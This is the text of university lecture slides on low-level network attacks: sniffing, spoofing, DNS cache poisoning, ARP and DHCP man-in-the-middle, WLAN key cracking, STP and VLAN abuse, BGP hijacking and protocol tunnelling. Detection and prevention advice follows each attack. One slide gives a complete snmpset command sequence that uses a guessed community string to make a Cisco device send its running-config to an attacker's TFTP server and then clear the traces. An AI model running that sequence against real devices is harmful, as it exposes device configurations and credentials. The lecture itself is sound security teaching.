Jeroen van Beek

1

Why bother? Popular / interesting attacks Now what? Questions?

2

Low-level attacks can be very dangerous◦ In many cases difficult to detect / prevent in higher

OSI levels

3

4

Passive attack Works on non-switched networks◦ Including WLAN

Find interesting information◦ Plain text services◦ HTTP logins (see lab assignment)◦ SNMP◦ Telnet (still used in some environments!)◦ Password hashes (‘pass the hash’)

Detection and prevention◦ Use switched networks

5

Active attack Switched environments only show broadcast /

multicast traffic Overflow CAM tables◦ Switch will forward traffic to all ports◦ See dnsniff’s macof

https://www.monkey.org/~dugsong/dsniff/

Detection and prevention◦ Limit the number of MACs per switch port Monitor or auto shutdown

6

Using a forged source IP address to◦ Impersonating other systems

Targets◦ UDP services◦ TCP services with predictable characteristics◦ DoS

7

Oldskewl problem Weak authentication mechanisms using UDP◦ Add your system to the list of trusted systems using a

spoofed packet

More difficult to exploit for TCP services◦ Because of handshaking◦ However not impossible with TCP sequence prediction

However old mistakes are made again◦ Everything over IP◦ Burglar alarm over UDP Including status messages and switching the system off

8

Kaminsky DNS Spoofing◦ Attacker’s website contains link to x.domain.com E.g. an image

◦ Target’s DNS server resolves x.domain.com◦ The attacker knows this and sends replies with fake

records to the target UDP, query ID (QID) identifies reply QID is 16 bit value (65.536) possibilities: send all Include forged referral for domain.com for cache poison

◦ domain.com point to IP of attacker’s choice◦ http://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-

Kaminsky/BlackHat-Japan-08-Kaminsky-DNS08-BlackOps.pdf

9

Mainly used for DoS attacks Increasing efficiency◦ NTP monlist◦ SNMP◦ DNS: ANY query DNSSEC

Send one spoofed packet to broadcast address◦ Many hosts / services reply to spoofed address◦ So called ‘smurf attack’

10

11

Detection◦ Check source IPs IDS

Prevention◦ Do not use source IPs for authentication purposes ◦ Do not use UDP for (indirect) authentication purposes◦ Ingress / egress filtering Drop spoofed packets RFC 2827

12

Used to become a man in the middle Attacker answers clients before the real

server does◦ Provide client with fake DNS servers / gateway / ...

Monitor / modify traffic Detection and prevention◦ Several tools out there for detection: Network devices: DHCP snooping, UNIX: dhcp_probe,

Windows: dhcploc Shutdown unused network ports

◦ Lockdown client PCs

13

Ethernet attack, both for wired and wireless Fake an ARP address to become a man in the

middle

14

Find interesting information◦ Plain text services◦ Password hashes

Use MITM exploits for specific services◦ E.g. SSHv1, HTTPS, POPS, IMAPS, SIPS, RDP

Sophisticated tools are available, automating MITM, sniffing and cracking◦ Ettercap https://github.com/Ettercap/ettercap Sed for network traffic

◦ Cain & Abel http://www.oxid.it/cain.html http://www.youtube.com/watch?v=BXPqq_XQZu8

15

16

Detection and prevention◦ Network devices: ARP inspection◦ Limit the number of MACs per switch port Monitor or auto shutdown

17

In most cases no device authentication In many cases shared secrets◦ WEP (still used for e.g. legacy industrial applications)◦ WPA PSK (‘pre shared keys’)◦ One key to own them all!

Flaws in crypto◦ WEP◦ WPA TKIP◦ WPS

18

Attacking isolated wireless networks◦ High power adapters◦ High gain antennas

Attacking crypto◦ Weaknesses allow an attacker to retrieve secret key◦ Aircrack-ng http://www.aircrack-ng.org/◦ After retrieving the key it’s a virtual plain network cable

Attacking passwords◦ Defaults◦ Easy-to-guess / crack◦ MAC derived

https://www.usenix.org/system/files/conference/woot15/woot15-paper-lorente.pdf

◦ Jam signal first to trigger association messages

19

20

21

Attacking OS functionality◦ Popular OSs store WLAN settings◦ Device tries to find the SSIDs automatically◦ Set up your own access point Forward traffic to real access point

◦ MITM

Detection and prevention◦ Detection of rogue APs◦ Prevent problems by hardening wireless equipment

and by using proven technologies IEEE 802.1x AES encryption

22

Many protocols are used for network management◦ Simple Network Management Protocol (SNMP)

Spanning Tree Protocol (STP)◦ Cisco Discovery Protocol (CDP)◦ Hot Standby Router Protocol (HSRP)◦ …

Most are OSI layer 2 based Most are designed with availability in mind◦ Weak / no security features

Many are enabled by default

23

Example: SNMP◦ Uses ‘community strings’ Some kind of secret password Read-only and read-write Defaults: ‘public’ and ‘private’

◦ Attacks Guess / brute force community string Most OSs: information leakage (accounts, routing) Cisco: dump config

24

25

snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1

#The ConfigCopyProtocol is set to TFTP

snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 4

#Set the SourceFileType to running-config

snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 1

#Set the DestinationFileType to networkfile

snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a <TFTP IP>

#Sets the ServerAddress to the IP address of the TFTP server

snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s <Filename>

#Sets the CopyFilename to your desired file name.

snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1

#Sets the CopyStatus to active which starts the copy process.

snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6

#Sets the CopyStatus to delete which cleans all saved information out of the MIB

26

Example: Spanning Tree Protocol◦ Used for redundancy◦ Takes care of topology changes Broken network links

Network loops

Malfunctioning network devices

◦ One device is the ‘root’ The root can trigger a reconfiguration

◦ During reconfiguration all devices act like a hub Sniffing

◦ No security features in the protocol Become the root and reconfigure the network in such a way

that all traffic pass through your system

27

28

Detection◦ Monitor topology changes In practice: ?

Prevention◦ IP based: ACLs◦ Use security features of network equipment◦ Never use network management protocol on access

ports of end-users◦ Disable all unneeded management protocols

29

Connect to other – less restrictive - VLANs◦ In many cases supported built-in in driver◦ Fancy tools available to make attacks easy to perform, e.g.

(ab)using misconfigured network management protocols: http://www.yersinia.net/

https://github.com/nccgroup/vlan-hopping---frogger

Detection◦ Not needed, just prevent it

Prevention◦ Disable trunk negotiation◦ Configure ports as access ports◦ Don’t use VLAN1

30

Used for core routing on the internet◦ Autonomous Systems (AS) advertize IP ranges that

are reachable using their routers

Become an AS and start peering Advertize IP ranges that aren’t yours◦ Traffic is routed via your systems◦ Sniffing, MITM◦ Happens accidently and on purpose

31

Attacks◦ http://www.blackhat.com/presentations/bh-

europe-09/Rey_Mende/BlackHat-Europe-2009-Mende-Rey-All-Your-Packets-slides.pdf◦ http://www.blackhat.com/docs/us-

15/materials/us-15-Gavrichenkov-Breaking-HTTPS-With-BGP-Hijacking-wp.pdf

Detection◦ Monitoring: https://bgpmon.net/

Prevention◦ RPKI?

34

Abuse authorized protocols to open unauthorized communication channels◦ TCP over ICMP Ptunnel @ http://www.cs.uit.no/~daniels/PingTunnel/

◦ Tunnel IP over DNS Iodine @ http://code.kryo.se/iodine/

◦ Tunnel IP over … Everything!

◦ See https://www.os3.nl/_media/2005-2006/rp1/ms_mk_report.pdf, http://www.delaat.net/rp/2014-2015/p98/report.pdf and recent OT projects

35

36

37

Detection◦ Lab assignment!

Prevention◦ Lab assignment!

38

Sensitive information might also use other networks◦ DECT, GSM, Bluetooth, …

Those are not covered in this talk◦ However: be aware of the risks!

More and more phones and tablets are part of the network…◦ Are they (also) well-protected against the attacks

we’ve seen earlier today?

39

Detection:◦ Detection of well-known attacks using IDS

Prevention:◦ Don’t trust the network! ◦ Shutdown all unused ports◦ Enforce the use of safe protocols Problems on lower OSI levels shouldn’t affect the

security level of applications

There’s more than (wireless) Ethernet◦ Be aware of other technologies that provide access

to sensitive information DECT, GSM, VoIP, …

40

J.C.vanBeek uva.nl

41